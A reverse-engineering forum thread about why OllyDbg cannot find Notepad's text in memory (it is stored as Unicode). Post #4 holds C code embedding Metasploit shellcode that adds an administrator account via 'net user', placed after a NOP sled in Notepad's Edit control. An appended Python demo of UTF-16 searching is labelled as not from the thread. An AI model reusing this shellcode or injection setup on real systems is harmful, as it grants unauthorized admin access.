
Thread: String doesn't appear in [Memory map] - why?

  1. #1
    Ismaele
    Guest

    Question String doesn't appear in [Memory map] - why?

    Good morning,
    I'm a newbie.

    I ran notepad.exe (under Windows XP, service-packed) and wrote some text in the main window.

    Next, I opened Olly, attached to notepad.exe and refreshed the memory map.
    I searched in Olly for the string that I had previously written in the main window of notepad.exe.

    Why don't I find it in Olly's memory map? I've searched but nothing!!!
    Can you suggest me a solution, please? I'm using OllyDbg 1.10.

    Many thanks to all :-)
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647
    I repeated your exercise: open Notepad, write in it "Fucking find me".
    Attached Olly.
    Let it run.
    Pause it.
    View Memory.
    Search the whole block for "Fucking fi" in ASCII. . .
    -> Nothing found.
    Go back to the beginning of the memory block.
    Search "Fucking fi" in UNICODE.
    -> Found the string somewhere in low memory, below 00400000.


    Make sure you pay attention to the options (case sensitive or not, whole words or not), and mind that the search engine goes from the cursor location towards the bottom (i.e. higher memory addresses).

  3. #3
    Ismaele
    Guest

    Smile

    Many thanks, mister! :-)
    The solution you suggested solved my question.

    But, I ask you, why does Olly behave like this?

    Are the steps you described a step-by-step method for all string searches in the memory map?

    Good morning

  4. #4
    Ismaele
    Guest

    Question

    Help, now I can't find hexadecimal values in Olly! Why?

    I have this C code (compiled under Borland C++ Builder 3):
    -------------------------------------------------------------
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        HANDLE parentWindow, childWindow; // variables used, respectively, for the handle of the PARENT class and the handle of the CHILD class
        HHOOK hh;
        char *buf;

        /* win32_exec - EXITFUNC=process CMD=cmd.exe /c net user hakin9 hakin9 /add && net localgroup administrators /add hakin9 Size=240 Encoder=PexFnstenvSub http://metasploit.com */
        unsigned char scode[] = "\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
        "\x19\xe7\x78\x83\xeb\xfc\xe2\xf4\x35\xf1\xa3\x78\xc9\x19\x6c\x3d"
        "\xf5\x92\x9b\x7d\xb1\x18\x08\xf3\x86\x01\x6c\x27\xe9\x18\x0c\x31"
        "\x42\x2d\x6c\x79\x27\x28\x27\xe1\x65\x9d\x27\x0c\xce\xd8\x2d\x75"
        "\xc8\xdb\x0c\x8c\xf2\x4d\xc3\x7c\xbc\xfc\x6c\x27\xed\x18\x0c\x1e"
        "\x42\x15\xac\xf3\x96\x05\xe6\x93\x42\x05\x6c\x79\x22\x90\xbb\x5c"
        "\xcd\xda\xd6\xb8\xad\x92\xa7\x48\x4c\xd9\x9f\x74\x42\x59\xeb\xf3"
        "\xb9\x05\x4a\xf3\xa1\x11\x0c\x71\x42\x99\x57\x78\xc9\x19\x6c\x10"
        "\xf5\x46\xd6\x8e\xa9\x4f\x6e\x80\x4a\xd9\x9c\x28\xa1\x67\x3f\x9a"
        "\xba\x71\x7f\x86\x43\x17\xb0\x87\x2e\x7a\x8a\x1c\xe7\x7c\x9f\x1d"
        "\xe9\x36\x84\x58\xa7\x7c\x93\x58\xbc\x6a\x82\x0a\xe9\x71\x86\x13"
        "\xa0\x77\xde\x58\xa1\x78\x8c\x11\xa7\x20\xc7\x57\xa8\x7d\x83\x58"
        "\xef\x3f\xc7\x16\xac\x6d\xc7\x14\xa6\x7a\x86\x14\xae\x6b\x88\x0d"
        "\xb9\x39\x86\x1c\xa4\x70\x89\x11\xba\x6d\x95\x19\xbd\x76\x95\x0b"
        "\xe9\x36\x86\x1c\xad\x39\x8f\x19\xa2\x70\x89\x41\xc9\x19\xe7\x78";

        childWindow=(HANDLE)0x8020C; // hard-coded window handle of Notepad's Edit control; it is only valid for that particular run of Notepad

        if(!childWindow) {
            printf("I didn't find that handle!\n");
            system("PAUSE");
            return(1);
        }
        if(SendMessage((HWND)childWindow, EM_SETREADONLY, FALSE, 0)==0) {
            printf("Signal EM_SETREADONLY sent to notepad.exe failed!\n");
            system("PAUSE");
            return 1;
        }

        buf = (char*)malloc(strlen((char*)scode)+1024*1024+1); // modified BY ME
        memset(buf, 0x90, 1024*1024);  // 1 MB of filler bytes
        buf[1024*1024] = 0;            // terminate the filler so strcat() knows where to append
        strcat(buf, (char*)scode);
        SendMessage((HWND)childWindow, EM_SETLIMITTEXT, strlen((char*)scode)+1024*1024+1, 0);

        if(!SendMessage((HWND)childWindow, WM_SETTEXT, 0, (LPARAM)buf)) {
            printf("Sending WM_SETTEXT message failed!\n");
            system("PAUSE");
            return 1;
        }

        printf("OK !\n");
        system("PAUSE");
        return(0);
    }
    -----------------------------------------------------------------

    My program runs very well; it actually writes the scode[] array into the "Edit" control of notepad.exe, but I didn't find the values "\x33\xc9\x83\xe9" in the [Memory map] of OllyDbg.

    Why? I also tried to search for the value '33C983E9' as you suggested. But nothing!

    Instead of the scode[] array, if I write some normal chars (like 'try' or 'testtesttest' or 'computercomputercomputer') in the 'Edit' control of notepad.exe, I do find them in the memory map.

    I don't understand :-(

  5. #5
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647

    In blue

    Quote Originally Posted by Ismaele View Post
    But, I ask you, why does Olly behave like this?

    This is not a behaviour of Olly. Olly is obediently finding what we are asking for. It is a behaviour of Notepad: it is storing its strings in Unicode format. Ever since Windows XP, Windows has used Unicode to manipulate all strings in order to handle all the written alphabets on the planet, including Chinese.

    Are the steps you described a step-by-step method for all string searches in the memory map?

    You may say so. You cannot predict what format a given program will use to store a given item in memory: it may use ASCII, it may use UNICODE, it may use some proprietary encoding, or the program may even encrypt the strings to prevent us from locating them. . .



  6. #6
    Naides is Nobody
    Join Date
    Jan 2002
    Location
    Planet Earth
    Posts
    1,647

    It is found: in Unicode

    The string is there in Unicode. You will not find the hex 33C983. . ., which is the translation of \x33\xc9\x83. . . to its raw-byte equivalent. Only after the C compiler interprets \x33\xc9\x83 during compilation is it translated to hex bytes, and those are loaded into memory when you run the compiled program itself, not the high-level C code text you wrote into the Edit control of Notepad.
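The two points made in #2 and in #5/#6 (Notepad keeps Edit-control text as UTF-16, and typing "\x33\xc9" produces the characters of the escape sequence, not the bytes 33 C9) can be reproduced over a constructed memory block. This is an added example, not code from the thread; MEMORY is a made-up byte string standing in for the process memory Olly would show, and the helper names are my own:

```python
import re

# Constructed sample (not a real dump): the escape text as the C source holds it.
SOURCE_LITERAL = r"\x33\xc9\x83\xe9"


def c_escapes_to_bytes(src: str) -> bytes:
    """Raw bytes the C compiler emits for a literal body such as '\\x33\\xc9'.
    Handles \\xHH escapes and plain ASCII characters only."""
    out = bytearray()
    i = 0
    while i < len(src):
        if src.startswith("\\x", i):
            out.append(int(src[i + 2:i + 4], 16))
            i += 4
        else:
            out.append(ord(src[i]))
            i += 1
    return bytes(out)


def find_all(block: bytes, needle: bytes) -> list:
    """Every offset at which needle occurs in block (like Olly's block search)."""
    return [m.start() for m in re.finditer(re.escape(needle), block)]


def search_text(block: bytes, text: str) -> dict:
    """Search for typed text in both encodings Olly offers: ASCII and UTF-16LE."""
    return {"ascii": find_all(block, text.encode("ascii")),
            "unicode": find_all(block, text.encode("utf-16-le"))}


# Constructed stand-in for Notepad's memory: an ASCII module name plus two
# Edit-control strings, which Notepad keeps as UTF-16LE, never as ASCII.
MEMORY = (b"\x00" * 16
          + b"notepad.exe\x00"
          + "find me".encode("utf-16-le")
          + b"\x00" * 8
          + SOURCE_LITERAL.encode("utf-16-le")
          + b"\x00" * 8)


def demo() -> tuple:
    typed = search_text(MEMORY, "find me")           # ascii: [], unicode: [28]
    raw = c_escapes_to_bytes(SOURCE_LITERAL)         # b'3\xc9\x83\xe9', i.e. 33C983E9
    raw_hits = find_all(MEMORY, raw)                 # []: those bytes never existed here
    literal_hits = search_text(MEMORY, SOURCE_LITERAL)["unicode"]  # [50]: the typed text
    return typed, raw_hits, literal_hits
```

The same search_text() call can be run over a real memory dump read from disk; the ASCII search failing while the UTF-16 search succeeds is exactly what #2 observed in Olly.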
